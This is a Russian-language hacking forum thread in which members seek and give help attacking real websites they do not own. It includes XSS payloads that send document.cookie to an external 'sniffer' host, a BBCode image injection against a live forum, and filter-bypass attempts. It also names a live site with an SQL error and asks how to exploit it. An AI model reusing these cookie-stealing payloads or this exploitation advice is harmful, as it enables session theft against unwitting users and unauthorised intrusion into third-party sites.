![]() |
Предлагаю сделать небольшую объединяющую тему для разбора реальных уязвимостей, будь sqli, xss, инклуды и т.п.
Если выкладываете ссылку на сайт, делайте хайд, чтобы она не индексировалась. Ну и максимально полное описание проблемы + четко сформулированный вопрос. Перед тем, как задать вопрос, прошу пользоваться гуглом и поиском по форуму, чтобы не спрашивать дважды, а то и трижды одно и то же. |
Вобщем проблемма такая) Нашел уязвимость на рандомном сайте
Скрытый текст (вы должны быть авторизованы и иметь 5 сообщений): У вас нет прав чтобы видеть скрытый текст, который находится здесь alert('') выполняется при вводе code: '>">alert(/XSS/) в строку поиска или в адресную строку. Но на этом всё и закончилось, ибо как я не пытался вбить туда скрипт под HPС Снифф, он не выполняется.. Сообственно тело скрипта code: "> img = new Image(); img.src = "Адресс снифа"+document.cookie; Вполне вероятно, что у меня просто неправильное представление о выполнее XSS кода.. Если это так и есть, то ткните, где именно я туплю) буду очень благодарен =) p.s. сайт не имеет пользовательской авторизации. Но IP и тип браузера на снифф отсылаться-то вроде должны?.. |
Срабатывает так:
Скрытый текст (вы должны быть авторизованы и иметь 5 сообщений): У вас нет прав чтобы видеть скрытый текст, который находится здесь Используй код для пассивной атаки из настроек нашего снифера |
stan_q, да, так прокатило =) спасибо большое))
тогда по теме еще один вопрос, возможно ли запускать этот скрипт через результат поиска по сайту (если XSS в поисковике, а адресная строка без уязвимостей) Я так понимаю, если alert прокатывает, значит сайт пропускает . А если сайт пропускает скрипт, то можно вбить его в поисковик и в обновлённой странице в исходном коде будет целый и невредимый скрипт.. Тоесть при заходе юзера на ссылку с результатом поиска, при загрузке страницы этот скрипт будет выполняться. Я правильно понимаю?) |
Да, если alert срабатывает, то скрипт не фильтрует вводимые данные. Но если запрос передается через POST-запрос, то для эксплуатации надо будет применять разные методы, чтобы заставить жертву выполнить нужный тебе запрос. Т.е. чтобы жертва сама ввела в поиск вредноносный код и нажала энтер для его выполнения. Поправьте меня, если я ошибаюсь.
[offtop] Мой 1000-й пост [/offtop] |
stan_q, Post запросы, вроде как, идут только на ресурсах с коментариями и заливкой файлов. И то, только в части сайта.. Другая часть сайта работает по обычному принципу
Если фильтр изменяет символы code: " , еще есть шанс замутить активную XSS или только пасивную? В разных частях сайта запросы выполняются по разному или везде один фильтр? тоесть если на всех страницах сайта Alert не канает, возможно ли существование такого отдела сайта, где скрипт запустится? или фильтр работает по всему сайту? p.s. Гц с юбилейным постом =) |
Столкнулся с такой проблеммой:
На одном форуме нашел возможность добавление code: [JPG][/JPG] Добавил картинку со сниффера - прокатило, и он даже IP пользователей ловит =) Дальше пробовал поставить Пробел после ссылки на картинку и опять всё отлично =) Но при попытке вставить Java код, а точнее code: http://httpz.ru/картинка dynsrc=javascript:document.write('img = new Image(); img.src = "http://httpz.ru/сниффер?"+document.cookie;') картинка убивается и на её месте пустое место. Собственно вопрос - Если такая фигня, активная XSS еще возможно? или полностью отпадает? p.s Пробовал lowsrc и перестановку Java скрипта.. Картинка всё так же не читается) p.s.s. Вот всё, что известно мне о сайте. 1)Форум стоит на булке v4.0.0 2)Фильтратор изменяет такие символы, как и " 3)Перевод скриптов в Hex и Юник делают скрипт нечитаемым (хотя он остаётся целым) Что можно еще попробовать сделать с скриптом?) Интересны все предложения =) |
Цитата:
Что можно еще попробовать сделать с скриптом? HTML highlight где http://www.qweqw.ru/1.jpg - адрес отображаемой картинки |
M@ZAX@KEP, не прокатило.. картинка не запустилась ни в одном случае)
|
Такой вопрос!
Вот сайт http://teploe-okno.ru/page.php?pid=-1 возврашает 2 ошибки одна в левом столбце это sql ошибка! до неё я не смог добраться(( а внизу перед footer возникает такая ошибка code: Warning: is_dir() [function.is-dir]: open_basedir restriction in effect. File(/var/www/vhosts/teploe-okno.ru/httpdocs/hpics/1/) is not within the allowed path(s): (/home/users2/k/karakovski/:/usr/local/lib/php/:/tmp/) in /home/users2/k/karakovski/domains/teploe-okno.ru/page.php on line 31 как я знаю is_dir() булевая функция опредиляюшие евляеться ли файл дирикторией! Вот у меня вопрос это значит что файл подгружаеться из дериктории get параметром?? если да то что можно сделать?? и вообще что можно сделать? |
| Время: 09:31 |